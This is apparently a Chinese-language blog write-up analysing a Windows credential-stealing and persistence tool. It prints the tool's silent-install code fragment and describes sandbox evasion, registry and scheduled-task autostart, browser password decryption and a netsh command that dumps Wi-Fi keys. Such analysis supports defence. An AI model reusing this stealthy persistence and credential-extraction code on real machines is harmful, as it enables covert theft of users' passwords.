for method, name in strategies:
try:
success = method() is True
results["steps"][name] = success
if success:
results["success"] = True
break # 成功则退出降级链
except Exception:
results["steps"][name] = False
return results
# ======================
# 🎯 统一调用接口(推荐方式)
# ======================
def install(target_script: Optional[str] = None) -> Dict[str, Any]:
"""
简洁接口:供其他 Python 文件一键调用
示例:
import silent_persistence
result = silent_persistence.install()
"""
try:
manager = SilentPersistence(target_script)
return manager.install()
except Exception as e:
return {
"success": False,
"error": str(e),
"timestamp": datetime.now().isoformat(),
"steps": {}
}
# ======================
# 主入口(静默运行)
# ======================
if __name__ == "__main__":
# 自动切换到 pythonw 防止弹窗
if sys.executable.endswith("python.exe"):
pythonw = sys.executable.replace("python.exe", "pythonw.exe")
if os.path.exists(pythonw):
try:
subprocess.Popen(
[pythonw, __file__],
creationflags=subprocess.CREATE_NO_WINDOW,
close_fds=True
)
sys.exit(0)
except:
pass # 继续使用 python.exe
# 执行安装
install()
4.代码分析
大模型分析结果:
该项目是一个针对 Windows 系统的红队(Red Team)凭证窃取与持久化工具,核心目标是在目标主机上静默提取敏感凭证信息,并通过多种方式实现持久化、数据加密和扩散,整体流程具备反沙箱检测、无痕执行、数据窃取、加密备份等特征 。
核心步骤(按执行顺序)
步骤 1:沙箱 / 虚拟机检测(反分析)
调用scanner1.py的scan_environment方法,检测是否运行在虚拟机 / 沙箱环境:
- 检测维度:BIOS 字符串、系统制造商、磁盘大小、CPU 核心数、内存大小、运行进程(如 VMware 工具)、MAC 地址、鼠标交互、调试器等;
- 行为:若检测到沙箱 / 虚拟机,直接终止运行,避免被分析。
步骤 2:静默持久化(自启动)
调用config_manager2.py的install方法,通过四级降级策略实现程序自启动(成功即停止降级):
- Level 1:创建隐藏计划任务;
- Level 2:添加到当前用户注册表
HKEY_CURRENT_USER\Run; - Level 3:添加到系统注册表
HKEY_LOCAL_MACHINE\Run(需管理员); - Level 4:添加到用户启动文件夹(生成静默批处理文件);
- 特征:核心逻辑 Base64 加密、无文件残留、全程静默执行。
步骤 3:敏感凭证提取(核心目的)
提取两类核心敏感信息,存入内存后生成结构化数据:
- 浏览器密码提取(Chrome/Edge):
-
- 复制浏览器
Login Data数据库(避免文件锁定); - 从
Local State文件提取 AES 密钥(DPAPI 解密); - 解密数据库中保存的网站账号密码(支持 AES-GCM / 旧版 DPAPI 加密);
- 提取后删除临时数据库文件,避免痕迹。
- 复制浏览器
- WiFi 密码提取:
-
- 通过
netsh wlan show profiles获取所有 WiFi 配置文件; - 执行
netsh wlan show profile name=xxx key=clear提取明文密码; - 静默执行(
CREATE_NO_WINDOW),避免弹窗。
- 通过
步骤 4:数据加密与备份
- 生成 JSON 报告:将提取的凭证(浏览器 / WiFi)生成结构化 JSON 文件(临时目录);
- AES-256 加密压缩:用
pyzipper将 JSON 打包为加密 ZIP(密码固定为123456),并删除明文 JSON;
5.动态分析
动态执行该程序,观察其行为。
观察进程树,看到样本通过cmd.exe获取系统基本信息;通过schtasks.exe创建计划任务,对应了代码中持久化的功能的第一项;通过netsh.exe来获取网络信息

持久化:
在我的计算机中没有成功创建计划任务,于是完成的是持久化的第二项操作,在注册表启动项中写入该样本的自启动


文件写入:
最后在桌面生成了压缩包,解压后得到该报告,里面有样本收集的信息
更多推荐

所有评论(0)